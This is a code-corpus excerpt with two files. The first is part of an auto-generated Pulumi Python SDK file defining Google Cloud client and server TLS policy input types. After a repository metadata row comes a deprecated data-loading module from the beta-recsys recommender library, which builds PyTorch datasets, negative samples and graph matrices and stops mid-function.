def ip_blocks(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "ip_blocks", value)
@property
@pulumi.getter
def principals(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of peer identities to match for authorization. At least one principal should match. Each peer can be an exact match, or a prefix match (example, "namespace/*") or a suffix match (example, "*/service-account") or a presence match "*".
Authorization based on the principal name without certificate validation (configured by ServerTlsPolicy resource) is considered insecure.
"""
return pulumi.get(self, "principals")
@principals.setter
def principals(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "principals", value)
@pulumi.input_type
class ClientTlsPolicyClientCertificateArgs:
def __init__(__self__, *,
certificate_provider_instance: Optional[pulumi.Input['ClientTlsPolicyClientCertificateCertificateProviderInstanceArgs']] = None,
grpc_endpoint: Optional[pulumi.Input['ClientTlsPolicyClientCertificateGrpcEndpointArgs']] = None):
"""
:param pulumi.Input['ClientTlsPolicyClientCertificateCertificateProviderInstanceArgs'] certificate_provider_instance: The certificate provider instance specification that will be passed to the data plane, which will be used to load necessary credential information.
Structure is documented below.
:param pulumi.Input['ClientTlsPolicyClientCertificateGrpcEndpointArgs'] grpc_endpoint: gRPC specific configuration to access the gRPC server to obtain the cert and private key.
Structure is documented below.
"""
if certificate_provider_instance is not None:
pulumi.set(__self__, "certificate_provider_instance", certificate_provider_instance)
if grpc_endpoint is not None:
pulumi.set(__self__, "grpc_endpoint", grpc_endpoint)
@property
@pulumi.getter(name="certificateProviderInstance")
def certificate_provider_instance(self) -> Optional[pulumi.Input['ClientTlsPolicyClientCertificateCertificateProviderInstanceArgs']]:
"""
The certificate provider instance specification that will be passed to the data plane, which will be used to load necessary credential information.
Structure is documented below.
"""
return pulumi.get(self, "certificate_provider_instance")
@certificate_provider_instance.setter
def certificate_provider_instance(self, value: Optional[pulumi.Input['ClientTlsPolicyClientCertificateCertificateProviderInstanceArgs']]):
pulumi.set(self, "certificate_provider_instance", value)
@property
@pulumi.getter(name="grpcEndpoint")
def grpc_endpoint(self) -> Optional[pulumi.Input['ClientTlsPolicyClientCertificateGrpcEndpointArgs']]:
"""
gRPC specific configuration to access the gRPC server to obtain the cert and private key.
Structure is documented below.
"""
return pulumi.get(self, "grpc_endpoint")
@grpc_endpoint.setter
def grpc_endpoint(self, value: Optional[pulumi.Input['ClientTlsPolicyClientCertificateGrpcEndpointArgs']]):
pulumi.set(self, "grpc_endpoint", value)
@pulumi.input_type
class ClientTlsPolicyClientCertificateCertificateProviderInstanceArgs:
def __init__(__self__, *,
plugin_instance: pulumi.Input[str]):
"""
:param pulumi.Input[str] plugin_instance: Plugin instance name, used to locate and load CertificateProvider instance configuration. Set to "google_cloud_private_spiffe" to use Certificate Authority Service certificate provider instance.
"""
pulumi.set(__self__, "plugin_instance", plugin_instance)
@property
@pulumi.getter(name="pluginInstance")
def plugin_instance(self) -> pulumi.Input[str]:
"""
Plugin instance name, used to locate and load CertificateProvider instance configuration. Set to "google_cloud_private_spiffe" to use Certificate Authority Service certificate provider instance.
"""
return pulumi.get(self, "plugin_instance")
@plugin_instance.setter
def plugin_instance(self, value: pulumi.Input[str]):
pulumi.set(self, "plugin_instance", value)
@pulumi.input_type
class ClientTlsPolicyClientCertificateGrpcEndpointArgs:
def __init__(__self__, *,
target_uri: pulumi.Input[str]):
"""
:param pulumi.Input[str] target_uri: The target URI of the gRPC endpoint. Only UDS path is supported, and should start with "unix:".
"""
pulumi.set(__self__, "target_uri", target_uri)
@property
@pulumi.getter(name="targetUri")
def target_uri(self) -> pulumi.Input[str]:
"""
The target URI of the gRPC endpoint. Only UDS path is supported, and should start with "unix:".
"""
return pulumi.get(self, "target_uri")
@target_uri.setter
def target_uri(self, value: pulumi.Input[str]):
pulumi.set(self, "target_uri", value)
@pulumi.input_type
class ClientTlsPolicyServerValidationCaArgs:
def __init__(__self__, *,
certificate_provider_instance: Optional[pulumi.Input['ClientTlsPolicyServerValidationCaCertificateProviderInstanceArgs']] = None,
grpc_endpoint: Optional[pulumi.Input['ClientTlsPolicyServerValidationCaGrpcEndpointArgs']] = None):
"""
:param pulumi.Input['ClientTlsPolicyServerValidationCaCertificateProviderInstanceArgs'] certificate_provider_instance: The certificate provider instance specification that will be passed to the data plane, which will be used to load necessary credential information.
Structure is documented below.
:param pulumi.Input['ClientTlsPolicyServerValidationCaGrpcEndpointArgs'] grpc_endpoint: gRPC specific configuration to access the gRPC server to obtain the cert and private key.
Structure is documented below.
"""
if certificate_provider_instance is not None:
pulumi.set(__self__, "certificate_provider_instance", certificate_provider_instance)
if grpc_endpoint is not None:
pulumi.set(__self__, "grpc_endpoint", grpc_endpoint)
@property
@pulumi.getter(name="certificateProviderInstance")
def certificate_provider_instance(self) -> Optional[pulumi.Input['ClientTlsPolicyServerValidationCaCertificateProviderInstanceArgs']]:
"""
The certificate provider instance specification that will be passed to the data plane, which will be used to load necessary credential information.
Structure is documented below.
"""
return pulumi.get(self, "certificate_provider_instance")
@certificate_provider_instance.setter
def certificate_provider_instance(self, value: Optional[pulumi.Input['ClientTlsPolicyServerValidationCaCertificateProviderInstanceArgs']]):
pulumi.set(self, "certificate_provider_instance", value)
@property
@pulumi.getter(name="grpcEndpoint")
def grpc_endpoint(self) -> Optional[pulumi.Input['ClientTlsPolicyServerValidationCaGrpcEndpointArgs']]:
"""
gRPC specific configuration to access the gRPC server to obtain the cert and private key.
Structure is documented below.
"""
return pulumi.get(self, "grpc_endpoint")
@grpc_endpoint.setter
def grpc_endpoint(self, value: Optional[pulumi.Input['ClientTlsPolicyServerValidationCaGrpcEndpointArgs']]):
pulumi.set(self, "grpc_endpoint", value)
@pulumi.input_type
class ClientTlsPolicyServerValidationCaCertificateProviderInstanceArgs:
def __init__(__self__, *,
plugin_instance: pulumi.Input[str]):
"""
:param pulumi.Input[str] plugin_instance: Plugin instance name, used to locate and load CertificateProvider instance configuration. Set to "google_cloud_private_spiffe" to use Certificate Authority Service certificate provider instance.
"""
pulumi.set(__self__, "plugin_instance", plugin_instance)
@property
@pulumi.getter(name="pluginInstance")
def plugin_instance(self) -> pulumi.Input[str]:
"""
Plugin instance name, used to locate and load CertificateProvider instance configuration. Set to "google_cloud_private_spiffe" to use Certificate Authority Service certificate provider instance.
"""
return pulumi.get(self, "plugin_instance")
@plugin_instance.setter
def plugin_instance(self, value: pulumi.Input[str]):
pulumi.set(self, "plugin_instance", value)
@pulumi.input_type
class ClientTlsPolicyServerValidationCaGrpcEndpointArgs:
def __init__(__self__, *,
target_uri: pulumi.Input[str]):
"""
:param pulumi.Input[str] target_uri: The target URI of the gRPC endpoint. Only UDS path is supported, and should start with "unix:".
"""
pulumi.set(__self__, "target_uri", target_uri)
@property
@pulumi.getter(name="targetUri")
def target_uri(self) -> pulumi.Input[str]:
"""
The target URI of the gRPC endpoint. Only UDS path is supported, and should start with "unix:".
"""
return pulumi.get(self, "target_uri")
@target_uri.setter
def target_uri(self, value: pulumi.Input[str]):
pulumi.set(self, "target_uri", value)
@pulumi.input_type
class ServerTlsPolicyMtlsPolicyArgs:
def __init__(__self__, *,
client_validation_cas: Optional[pulumi.Input[Sequence[pulumi.Input['ServerTlsPolicyMtlsPolicyClientValidationCaArgs']]]] = None,
client_validation_mode: Optional[pulumi.Input[str]] = None,
client_validation_trust_config: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[Sequence[pulumi.Input['ServerTlsPolicyMtlsPolicyClientValidationCaArgs']]] client_validation_cas: Required if the policy is to be used with Traffic Director. For external HTTPS load balancers it must be empty.
Defines the mechanism to obtain the Certificate Authority certificate to validate the client certificate.
Structure is documented below.
:param pulumi.Input[str] client_validation_mode: When the client presents an invalid certificate or no certificate to the load balancer, the clientValidationMode specifies how the client connection is handled.
Required if the policy is to be used with the external HTTPS load balancing. For Traffic Director it must be empty.
Possible values are: `CLIENT_VALIDATION_MODE_UNSPECIFIED`, `ALLOW_INVALID_OR_MISSING_CLIENT_CERT`, `REJECT_INVALID`.
:param pulumi.Input[str] client_validation_trust_config: Reference to the TrustConfig from certificatemanager.googleapis.com namespace.
If specified, the chain validation will be performed against certificates configured in the given TrustConfig.
Allowed only if the policy is to be used with external HTTPS load balancers.
"""
if client_validation_cas is not None:
pulumi.set(__self__, "client_validation_cas", client_validation_cas)
if client_validation_mode is not None:
pulumi.set(__self__, "client_validation_mode", client_validation_mode)
if client_validation_trust_config is not None:
pulumi.set(__self__, "client_validation_trust_config", client_validation_trust_config)
@property
@pulumi.getter(name="clientValidationCas")
def client_validation_cas(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ServerTlsPolicyMtlsPolicyClientValidationCaArgs']]]]:
"""
Required if the policy is to be used with Traffic Director. For external HTTPS load balancers it must be empty.
Defines the mechanism to obtain the Certificate Authority certificate to validate the client certificate.
Structure is documented below.
"""
return pulumi.get(self, "client_validation_cas")
@client_validation_cas.setter
def client_validation_cas(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ServerTlsPolicyMtlsPolicyClientValidationCaArgs']]]]):
pulumi.set(self, "client_validation_cas", value)
@property
@pulumi.getter(name="clientValidationMode")
def client_validation_mode(self) -> Optional[pulumi.Input[str]]:
"""
When the client presents an invalid certificate or no certificate to the load balancer, the clientValidationMode specifies how the client connection is handled.
Required if the policy is to be used with the external HTTPS load balancing. For Traffic Director it must be empty.
Possible values are: `CLIENT_VALIDATION_MODE_UNSPECIFIED`, `ALLOW_INVALID_OR_MISSING_CLIENT_CERT`, `REJECT_INVALID`.
"""
return pulumi.get(self, "client_validation_mode")
@client_validation_mode.setter
def client_validation_mode(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "client_validation_mode", value)
@property
@pulumi.getter(name="clientValidationTrustConfig")
def client_validation_trust_config(self) -> Optional[pulumi.Input[str]]:
"""
Reference to the TrustConfig from certificatemanager.googleapis.com namespace.
If specified, the chain validation will be performed against certificates configured in the given TrustConfig.
Allowed only if the policy is to be used with external HTTPS load balancers.
"""
return pulumi.get(self, "client_validation_trust_config")
@client_validation_trust_config.setter
def client_validation_trust_config(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "client_validation_trust_config", value)
@pulumi.input_type
class ServerTlsPolicyMtlsPolicyClientValidationCaArgs:
def __init__(__self__, *,
certificate_provider_instance: Optional[pulumi.Input['ServerTlsPolicyMtlsPolicyClientValidationCaCertificateProviderInstanceArgs']] = None,
grpc_endpoint: Optional[pulumi.Input['ServerTlsPolicyMtlsPolicyClientValidationCaGrpcEndpointArgs']] = None):
"""
:param pulumi.Input['ServerTlsPolicyMtlsPolicyClientValidationCaCertificateProviderInstanceArgs'] certificate_provider_instance: Optional if policy is to be used with Traffic Director. For external HTTPS load balancer must be empty.
Defines a mechanism to provision server identity (public and private keys). Cannot be combined with allowOpen as a permissive mode that allows both plain text and TLS is not supported.
Structure is documented below.
:param pulumi.Input['ServerTlsPolicyMtlsPolicyClientValidationCaGrpcEndpointArgs'] grpc_endpoint: gRPC specific configuration to access the gRPC server to obtain the cert and private key.
Structure is documented below.
"""
if certificate_provider_instance is not None:
pulumi.set(__self__, "certificate_provider_instance", certificate_provider_instance)
if grpc_endpoint is not None:
pulumi.set(__self__, "grpc_endpoint", grpc_endpoint)
@property
@pulumi.getter(name="certificateProviderInstance")
def certificate_provider_instance(self) -> Optional[pulumi.Input['ServerTlsPolicyMtlsPolicyClientValidationCaCertificateProviderInstanceArgs']]:
"""
Optional if policy is to be used with Traffic Director. For external HTTPS load balancer must be empty.
Defines a mechanism to provision server identity (public and private keys). Cannot be combined with allowOpen as a permissive mode that allows both plain text and TLS is not supported.
Structure is documented below.
"""
return pulumi.get(self, "certificate_provider_instance")
@certificate_provider_instance.setter
def certificate_provider_instance(self, value: Optional[pulumi.Input['ServerTlsPolicyMtlsPolicyClientValidationCaCertificateProviderInstanceArgs']]):
pulumi.set(self, "certificate_provider_instance", value)
@property
@pulumi.getter(name="grpcEndpoint")
def grpc_endpoint(self) -> Optional[pulumi.Input['ServerTlsPolicyMtlsPolicyClientValidationCaGrpcEndpointArgs']]:
"""
gRPC specific configuration to access the gRPC server to obtain the cert and private key.
Structure is documented below.
"""
return pulumi.get(self, "grpc_endpoint")
@grpc_endpoint.setter
def grpc_endpoint(self, value: Optional[pulumi.Input['ServerTlsPolicyMtlsPolicyClientValidationCaGrpcEndpointArgs']]):
pulumi.set(self, "grpc_endpoint", value)
@pulumi.input_type
class ServerTlsPolicyMtlsPolicyClientValidationCaCertificateProviderInstanceArgs:
def __init__(__self__, *,
plugin_instance: pulumi.Input[str]):
"""
:param pulumi.Input[str] plugin_instance: Plugin instance name, used to locate and load CertificateProvider instance configuration. Set to "google_cloud_private_spiffe" to use Certificate Authority Service certificate provider instance.
"""
pulumi.set(__self__, "plugin_instance", plugin_instance)
@property
@pulumi.getter(name="pluginInstance")
def plugin_instance(self) -> pulumi.Input[str]:
"""
Plugin instance name, used to locate and load CertificateProvider instance configuration. Set to "google_cloud_private_spiffe" to use Certificate Authority Service certificate provider instance.
"""
return pulumi.get(self, "plugin_instance")
@plugin_instance.setter
def plugin_instance(self, value: pulumi.Input[str]):
pulumi.set(self, "plugin_instance", value)
@pulumi.input_type
class ServerTlsPolicyMtlsPolicyClientValidationCaGrpcEndpointArgs:
def __init__(__self__, *,
target_uri: pulumi.Input[str]):
"""
:param pulumi.Input[str] target_uri: The target URI of the gRPC endpoint. Only UDS path is supported, and should start with "unix:".
"""
pulumi.set(__self__, "target_uri", target_uri)
@property
@pulumi.getter(name="targetUri")
def target_uri(self) -> pulumi.Input[str]:
"""
The target URI of the gRPC endpoint. Only UDS path is supported, and should start with "unix:".
"""
return pulumi.get(self, "target_uri")
@target_uri.setter
def target_uri(self, value: pulumi.Input[str]):
pulumi.set(self, "target_uri", value)
@pulumi.input_type
class ServerTlsPolicyServerCertificateArgs:
def __init__(__self__, *,
certificate_provider_instance: Optional[pulumi.Input['ServerTlsPolicyServerCertificateCertificateProviderInstanceArgs']] = None,
grpc_endpoint: Optional[pulumi.Input['ServerTlsPolicyServerCertificateGrpcEndpointArgs']] = None):
"""
:param pulumi.Input['ServerTlsPolicyServerCertificateCertificateProviderInstanceArgs'] certificate_provider_instance: Optional if policy is to be used with Traffic Director. For external HTTPS load balancer must be empty.
Defines a mechanism to provision server identity (public and private keys). Cannot be combined with allowOpen as a permissive mode that allows both plain text and TLS is not supported.
Structure is documented below.
:param pulumi.Input['ServerTlsPolicyServerCertificateGrpcEndpointArgs'] grpc_endpoint: gRPC specific configuration to access the gRPC server to obtain the cert and private key.
Structure is documented below.
"""
if certificate_provider_instance is not None:
pulumi.set(__self__, "certificate_provider_instance", certificate_provider_instance)
if grpc_endpoint is not None:
pulumi.set(__self__, "grpc_endpoint", grpc_endpoint)
@property
@pulumi.getter(name="certificateProviderInstance")
def certificate_provider_instance(self) -> Optional[pulumi.Input['ServerTlsPolicyServerCertificateCertificateProviderInstanceArgs']]:
"""
Optional if policy is to be used with Traffic Director. For external HTTPS load balancer must be empty.
Defines a mechanism to provision server identity (public and private keys). Cannot be combined with allowOpen as a permissive mode that allows both plain text and TLS is not supported.
Structure is documented below.
"""
return pulumi.get(self, "certificate_provider_instance")
@certificate_provider_instance.setter
def certificate_provider_instance(self, value: Optional[pulumi.Input['ServerTlsPolicyServerCertificateCertificateProviderInstanceArgs']]):
pulumi.set(self, "certificate_provider_instance", value)
@property
@pulumi.getter(name="grpcEndpoint")
def grpc_endpoint(self) -> Optional[pulumi.Input['ServerTlsPolicyServerCertificateGrpcEndpointArgs']]:
"""
gRPC specific configuration to access the gRPC server to obtain the cert and private key.
Structure is documented below.
"""
return pulumi.get(self, "grpc_endpoint")
@grpc_endpoint.setter
def grpc_endpoint(self, value: Optional[pulumi.Input['ServerTlsPolicyServerCertificateGrpcEndpointArgs']]):
pulumi.set(self, "grpc_endpoint", value)
@pulumi.input_type
class ServerTlsPolicyServerCertificateCertificateProviderInstanceArgs:
def __init__(__self__, *,
plugin_instance: pulumi.Input[str]):
"""
:param pulumi.Input[str] plugin_instance: Plugin instance name, used to locate and load CertificateProvider instance configuration. Set to "google_cloud_private_spiffe" to use Certificate Authority Service certificate provider instance.
"""
pulumi.set(__self__, "plugin_instance", plugin_instance)
@property
@pulumi.getter(name="pluginInstance")
def plugin_instance(self) -> pulumi.Input[str]:
"""
Plugin instance name, used to locate and load CertificateProvider instance configuration. Set to "google_cloud_private_spiffe" to use Certificate Authority Service certificate provider instance.
"""
return pulumi.get(self, "plugin_instance")
@plugin_instance.setter
def plugin_instance(self, value: pulumi.Input[str]):
pulumi.set(self, "plugin_instance", value)
@pulumi.input_type
class ServerTlsPolicyServerCertificateGrpcEndpointArgs:
def __init__(__self__, *,
target_uri: pulumi.Input[str]):
"""
:param pulumi.Input[str] target_uri: The target URI of the gRPC endpoint. Only UDS path is supported, and should start with "unix:".
"""
pulumi.set(__self__, "target_uri", target_uri)
@property
@pulumi.getter(name="targetUri")
def target_uri(self) -> pulumi.Input[str]:
"""
The target URI of the gRPC endpoint. Only UDS path is supported, and should start with "unix:".
"""
return pulumi.get(self, "target_uri")
@target_uri.setter
def target_uri(self, value: pulumi.Input[str]):
pulumi.set(self, "target_uri", value)
|
bca26cdf311b3acbe6491a5907e65e149e26370c
|
3079a053cf4468d8d8408b77c9b140174c6b2585
|
/beta_rec/data/deprecated_data_base.py
|
ed32a7ffb8abcd45d4a1ac548f470e993fc05c9a
|
[
"MIT"
] |
permissive
|
beta-team/beta-recsys
|
02609ddd27b76b024b38f2ca202d3595e49d460d
|
625189d5e1002a3edc27c3e3ce075fddf7ae1c92
|
refs/heads/master
| 2023-09-03T11:44:47.171273
| 2023-08-28T13:33:59
| 2023-08-28T13:33:59
| 247,511,463
| 156
| 42
|
MIT
| 2023-05-22T23:55:46
| 2020-03-15T17:03:32
|
Python
|
UTF-8
|
Python
| false
| false
| 17,680
|
py
|
deprecated_data_base.py
|
import json
import os
import random
from copy import deepcopy
import numpy as np
import pandas as pd
import scipy.sparse as sp
import torch
from scipy.sparse.linalg import eigsh
from torch.utils.data import DataLoader, Dataset
from ..utils.common_util import ensureDir, normalized_adj_single
from ..utils.constants import (
DEFAULT_ITEM_COL,
DEFAULT_RATING_COL,
DEFAULT_TIMESTAMP_COL,
DEFAULT_USER_COL,
)
class UserItemRatingDataset(Dataset):
"""Wrapper, convert <user, item, rating> Tensor into Pytorch Dataset."""
def __init__(self, user_tensor, item_tensor, target_tensor):
"""Init UserItemRatingDataset Class.
Args:
target_tensor: torch.Tensor, the corresponding rating for <user, item> pair.
"""
self.user_tensor = user_tensor
self.item_tensor = item_tensor
self.target_tensor = target_tensor
def __getitem__(self, index):
"""Get an item from dataset."""
return (
self.user_tensor[index],
self.item_tensor[index],
self.target_tensor[index],
)
def __len__(self):
"""Get the size of the dataset."""
return self.user_tensor.size(0)
class RatingNegativeDataset(Dataset):
"""RatingNegativeDataset.
Wrapper, convert <user, item, rating> Tensor into Pytorch Dataset, which contains negative items with rating
being 0.0.
"""
def __init__(self, user_tensor, item_tensor, rating_tensor):
"""Init RatingNegativeDataset Class.
Args:
target_tensor: torch.Tensor, the corresponding rating for <user, item> pair.
"""
self.user_tensor = user_tensor
self.item_tensor = item_tensor
self.rating_tensor = rating_tensor
def __getitem__(self, index):
"""Get an item from the dataset.
Args:
index:
Returns: users, pos_items, neg_items, pos_ratings, neg_ratings
"""
return (
self.user_tensor[index],
self.item_tensor[index],
self.rating_tensor[index],
)
# index = torch.LongTensor(index, device=self.user_tensor.device)
# pos_index = index[self.rating_tensor[index] > 0]
# neg_index = index[self.rating_tensor[index] >= 0]
# return (
# self.user_tensor[pos_index],
# self.item_tensor[pos_index],
# self.rating_tensor[pos_index],
# self.user_tensor[neg_index],
# self.item_tensor[neg_index],
# self.rating_tensor[neg_index],
# )
def __len__(self):
"""Get the size of the dataset."""
return self.user_tensor.size(0)
class PairwiseNegativeDataset(Dataset):
"""Wrapper, convert <user, pos_item, neg_item> Tensor into Pytorch Dataset."""
def __init__(self, user_tensor, pos_item_tensor, neg_item_tensor):
"""Init PairwiseNegativeDataset Class.
Args:
target_tensor: torch.Tensor, the corresponding rating for <user, item> pair.
"""
self.user_tensor = user_tensor
self.pos_item_tensor = pos_item_tensor
self.neg_item_tensor = neg_item_tensor
def __getitem__(self, index):
"""Get an item from the dataset."""
return (
self.user_tensor[index],
self.pos_item_tensor[index],
self.neg_item_tensor[index],
)
def __len__(self):
"""Get the size of the dataset."""
return self.user_tensor.size(0)
class DataLoaderBase(object):
"""Construct dataset for NCF."""
def __init__(self, ratings):
"""Init DataLoaderBase Class.
Args:
ratings: pd.DataFrame, which contains 4 columns = ['userId', 'itemId', 'rating', 'timestamp']
"""
assert DEFAULT_USER_COL in ratings.columns
assert DEFAULT_ITEM_COL in ratings.columns
assert DEFAULT_RATING_COL in ratings.columns
assert DEFAULT_TIMESTAMP_COL in ratings.columns
self.ratings = ratings
# explicit feedback using _normalize and implicit using _binarize
# self.preprocess_ratings = self._normalize(ratings)
self.preprocess_ratings = self._binarize(ratings)
self.user_pool = set(self.ratings[DEFAULT_USER_COL].unique())
self.item_pool = set(self.ratings[DEFAULT_ITEM_COL].unique())
self.n_users = len(self.user_pool)
self.n_items = len(self.item_pool)
# create negative item samples for NCF learning
self.negatives = self._sample_negative(ratings)
def _normalize(self, ratings):
"""Normalize into [0, 1] from [0, max_rating], explicit feedback."""
ratings = deepcopy(ratings)
max_rating = ratings.rating.max()
ratings[DEFAULT_RATING_COL] = ratings.rating * 1.0 / max_rating
return ratings
def _binarize(self, ratings):
"""Binarize into 0 or 1, imlicit feedback."""
ratings = deepcopy(ratings)
ratings[DEFAULT_RATING_COL][ratings[DEFAULT_RATING_COL] > 0] = 1.0
return ratings
def _sample_negative(self, ratings):
"""Return all negative items & 100 sampled negative items."""
interact_status = (
ratings.groupby(DEFAULT_USER_COL)[DEFAULT_ITEM_COL]
.apply(set)
.reset_index()
.rename(columns={DEFAULT_ITEM_COL: "interacted_items"})
)
interact_status["negative_items"] = interact_status["interacted_items"].apply(
lambda x: self.item_pool - x
)
interact_status["negative_samples"] = interact_status["negative_items"].apply(
lambda x: random.sample(x, 99)
)
return interact_status[[DEFAULT_USER_COL, "negative_items", "negative_samples"]]
def instance_a_train_loader(self, num_negatives, batch_size):
"""Instance train loader for one training epoch."""
users, items, ratings = [], [], []
train_ratings = pd.merge(
self.ratings,
self.negatives[[DEFAULT_USER_COL, "negative_items"]],
on=DEFAULT_USER_COL,
)
train_ratings["negatives"] = train_ratings["negative_items"].apply(
lambda x: random.sample(x, num_negatives)
)
for _, row in train_ratings.iterrows():
users.append(int(row[DEFAULT_USER_COL]))
items.append(int(row[DEFAULT_ITEM_COL]))
ratings.append(float(row[DEFAULT_RATING_COL]))
for i in range(num_negatives):
users.append(int(row[DEFAULT_USER_COL]))
items.append(int(row.negatives[i]))
ratings.append(float(0)) # negative samples get 0 rating
dataset = UserItemRatingDataset(
user_tensor=torch.LongTensor(users),
item_tensor=torch.LongTensor(items),
target_tensor=torch.FloatTensor(ratings),
)
return DataLoader(dataset, batch_size=batch_size, shuffle=True)
def uniform_negative_train_loader(self, num_negatives, batch_size, device):
"""Instance a Data_loader for training.
Sample 'num_negatives' negative items for each user, and shuffle them with positive items.
A batch of data in this DataLoader is suitable for a binary cross-entropy loss.
# todo implement the item popularity-biased sampling
"""
users, items, ratings = [], [], []
train_ratings = pd.merge(
self.ratings,
self.negatives[[DEFAULT_USER_COL, "negative_items"]],
on=DEFAULT_USER_COL,
)
train_ratings["negatives"] = train_ratings["negative_items"].apply(
lambda x: random.sample(x, num_negatives)
)
for _, row in train_ratings.iterrows():
users.append(int(row[DEFAULT_USER_COL]))
items.append(int(row[DEFAULT_ITEM_COL]))
ratings.append(float(row[DEFAULT_RATING_COL]))
for i in range(num_negatives):
users.append(int(row[DEFAULT_USER_COL]))
items.append(int(row.negatives[i]))
ratings.append(float(0)) # negative samples get 0 rating
dataset = RatingNegativeDataset(
user_tensor=torch.LongTensor(users).to(device),
item_tensor=torch.LongTensor(items).to(device),
rating_tensor=torch.FloatTensor(ratings).to(device),
)
return DataLoader(dataset, batch_size=batch_size, shuffle=True)
def pairwise_negative_train_loader(self, batch_size, device):
"""Instance a pairwise Data_loader for training.
Sample ONE negative items for each user-item pare, and shuffle them with positive items.
A batch of data in this DataLoader is suitable for a binary cross-entropy loss.
# todo implement the item popularity-biased sampling
"""
users, pos_items, neg_items = [], [], []
train_ratings = pd.merge(
self.ratings,
self.negatives[[DEFAULT_USER_COL, "negative_items"]],
on=DEFAULT_USER_COL,
)
train_ratings["one_negative"] = train_ratings["negative_items"].apply(
lambda x: random.sample(x, 1)
)
for _, row in train_ratings.iterrows():
users.append(int(row[DEFAULT_USER_COL]))
pos_items.append(int(row[DEFAULT_ITEM_COL]))
neg_items.append(int(row.one_negative[0]))
dataset = PairwiseNegativeDataset(
user_tensor=torch.LongTensor(users).to(device),
pos_item_tensor=torch.LongTensor(pos_items).to(device),
neg_item_tensor=torch.LongTensor(neg_items).to(device),
)
return DataLoader(dataset, batch_size=batch_size, shuffle=True)
@property
def evaluate_data(self):
"""Create evaluation data."""
test_ratings = pd.merge(
self.test_ratings,
self.negatives[[DEFAULT_USER_COL, "negative_samples"]],
on=DEFAULT_USER_COL,
)
test_users, test_items, ratings = [], [], []
for row in test_ratings.itertuples():
test_users.append(int(row[DEFAULT_USER_COL]))
test_items.append(int(row[DEFAULT_ITEM_COL]))
ratings.append(1)
for i in range(len(row.negative_samples)):
test_users.append(int(row[DEFAULT_USER_COL]))
test_items.append(int(row.negative_samples[i]))
ratings.append(0)
test_df = pd.DataFrame(
{
DEFAULT_USER_COL: test_users,
DEFAULT_ITEM_COL: test_items,
DEFAULT_RATING_COL: ratings,
}
)
return test_df
def get_adj_mat(self, config):
"""Get the adjacent matrix, if not previously stored then call the function to create.
This method is for NGCF model.
Returns:
Different types of adjacment matrix.
"""
process_file_name = (
"ngcf_"
+ config["dataset"]["dataset"]
+ "_"
+ config["dataset"]["data_split"]
+ (
("_" + str(config["dataset"]["percent"] * 100))
if "percent" in config
else ""
)
)
process_path = os.path.join(
config["system"]["process_dir"],
config["dataset"]["dataset"] + "/",
)
process_file_name = os.path.join(process_path, process_file_name)
ensureDir(process_file_name)
print(process_file_name)
try:
adj_mat = sp.load_npz(os.path.join(process_file_name, "s_adj_mat.npz"))
norm_adj_mat = sp.load_npz(
os.path.join(process_file_name, "s_norm_adj_mat.npz")
)
mean_adj_mat = sp.load_npz(
os.path.join(process_file_name, "s_mean_adj_mat.npz")
)
print("already load adj matrix", adj_mat.shape)
except Exception:
adj_mat, norm_adj_mat, mean_adj_mat = self.create_adj_mat()
sp.save_npz(os.path.join(process_file_name, "s_adj_mat.npz"), adj_mat)
sp.save_npz(
os.path.join(process_file_name, "s_norm_adj_mat.npz"), norm_adj_mat
)
sp.save_npz(
os.path.join(process_file_name, "s_mean_adj_mat.npz"), mean_adj_mat
)
return adj_mat, norm_adj_mat, mean_adj_mat
def create_adj_mat(self):
"""Create adjacent matirx from the user-item interaction matrix."""
adj_mat = sp.dok_matrix(
(self.n_users + self.n_items, self.n_users + self.n_items), dtype=np.float32
)
adj_mat = adj_mat.tolil()
R = sp.dok_matrix((self.n_users, self.n_items), dtype=np.float32)
user_np = np.array(self.ratings[DEFAULT_USER_COL])
item_np = np.array(self.ratings[DEFAULT_ITEM_COL])
for u in range(self.n_users):
index = list(np.where(user_np == u)[0])
i = item_np[index]
for item in i:
R[u, item] = 1
R = R.tolil()
adj_mat[: self.n_users, self.n_users :] = R
adj_mat[self.n_users :, : self.n_users] = R.T
adj_mat = adj_mat.todok()
print("already create adjacency matrix", adj_mat.shape)
norm_adj_mat = normalized_adj_single(adj_mat + sp.eye(adj_mat.shape[0]))
mean_adj_mat = normalized_adj_single(adj_mat)
print("already normalize adjacency matrix")
return adj_mat.tocsr(), norm_adj_mat.tocsr(), mean_adj_mat.tocsr()
def get_graph_embeddings(self, config):
"""Get the graph embedding, if not previously stored then call the function to create.
This method is for LCFN model.
Returns:
eigsh of the graph matrix
"""
process_file_name = (
"lcfn_"
+ config["dataset"]["dataset"]
+ "_"
+ config["dataset"]["data_split"]
+ (
("_" + str(config["dataset"]["percent"] * 100))
if "percent" in config
else ""
)
)
process_path = os.path.join(
config["system"]["process_dir"],
config["dataset"]["dataset"] + "/",
)
process_file_name = os.path.join(process_path, process_file_name)
ensureDir(process_file_name)
print(process_file_name)
try:
with open(process_file_name + "/graph_embeddings.json") as f:
line = f.readline()
graph_embeddings = json.loads(line)
f.close()
print("already load graph embeddings")
except Exception:
graph_embeddings = self.create_graph_embeddings(config)
f = open(process_file_name + "/graph_embeddings.json", "w")
jsObj = json.dumps(graph_embeddings)
f.write(jsObj)
f.close()
cut_off = config["model"]["cut_off"]
[graph_u, graph_i] = graph_embeddings
graph_u = np.array(graph_u)[:, 0 : int(cut_off * self.n_users)].astype(
np.float32
)
graph_i = np.array(graph_i)[:, 0 : int(cut_off * self.n_items)].astype(
np.float32
)
return [graph_u, graph_i]
def create_graph_embeddings(self, config):
"""Create graph embeddings from the user and item hypergraph."""
cut_off = config["model"]["cut_off"]
user_np = np.array(self.ratings[DEFAULT_USER_COL])
item_np = np.array(self.ratings[DEFAULT_ITEM_COL])
user_number = self.n_users
item_number = self.n_items
tolerant = 0.1 ** 5
epsilon = 0.1 ** 10
H_u = sp.lil_matrix((user_number, item_number))
H_v = sp.lil_matrix((item_number, user_number))
D_u = sp.lil_matrix((user_number, user_number))
D_v = sp.lil_matrix((item_number, item_number))
I_u = sp.lil_matrix(np.eye(user_number, user_number))
I_v = sp.lil_matrix(np.eye(item_number, item_number))
